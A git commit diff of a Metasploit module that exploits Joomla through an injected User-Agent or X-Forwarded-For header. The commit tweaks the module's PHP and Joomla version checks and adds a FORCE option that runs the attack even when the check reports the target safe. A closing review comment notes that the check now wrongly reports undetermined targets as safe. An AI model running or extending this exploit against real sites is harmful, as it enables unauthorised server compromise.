implement @wchen-r7 's suggestions

bug/bundler_fix
Christian Mehlmauer 2015-12-16 20:31:43 +01:00
parent b43d580276
commit 76438dfb2f
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
1 changed files with 14 additions and 8 deletions


@ -6,7 +6,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
@ -51,6 +51,11 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
], self.class)
register_advanced_options(
[
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
], self.class)
end
def check
@ -80,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
if rest && rest.include?('ubuntu')
sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
vprint_status("Found Ubuntu PHP version: #{res.headers['X-Powered-By']}")
vprint_status("Found Ubuntu PHP version #{res.headers['X-Powered-By']}")
if version > Gem::Version.new('5.5.9')
vulnerable = false
@ -93,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
elsif rest && rest.include?('+deb')
sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
vprint_status("Found Debian PHP version #{res.headers['X-Powered-By']}")
if version > Gem::Version.new('5.4.45')
vulnerable = false
@ -103,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
vulnerable = true
end
else
vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
vprint_status("Found PHP version #{res.headers['X-Powered-By']}")
vulnerable = true if version <= Gem::Version.new('5.4.44')
vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
@ -117,8 +122,9 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
if joomla_version
return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
unless joomla_version.empty?
vprint_status("Detected Joomla version #{joomla_version}")
return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
end
end
@ -131,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
Exploit::CheckCode::Unknown
Exploit::CheckCode::Safe
end
def get_payload
@ -152,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
if check == Exploit::CheckCode::Safe
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
print_error('Target seems safe, so we will not continue.')
return
end
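Review bot: The fall-through at the end of `check` (hunk -131,7 +137,7) now returns `Exploit::CheckCode::Safe` instead of `Exploit::CheckCode::Unknown`, so a target where nothing conclusive was detected is presumably reported the same way as one positively identified as patched. For anyone reading `check` output as an assessment result that is a false negative, and the gate in `exploit` that acts on `Safe` can no longer tell the two cases apart. I would keep `Exploit::CheckCode::Unknown` as the final value and return `Safe` only from branches where a version comparison established a fixed release, with a comment such as `# nothing conclusive was detected; do not report Safe`. The lines of `check` just before this return are outside the visible hunks, so confirm that no earlier branch already handles the undetermined case.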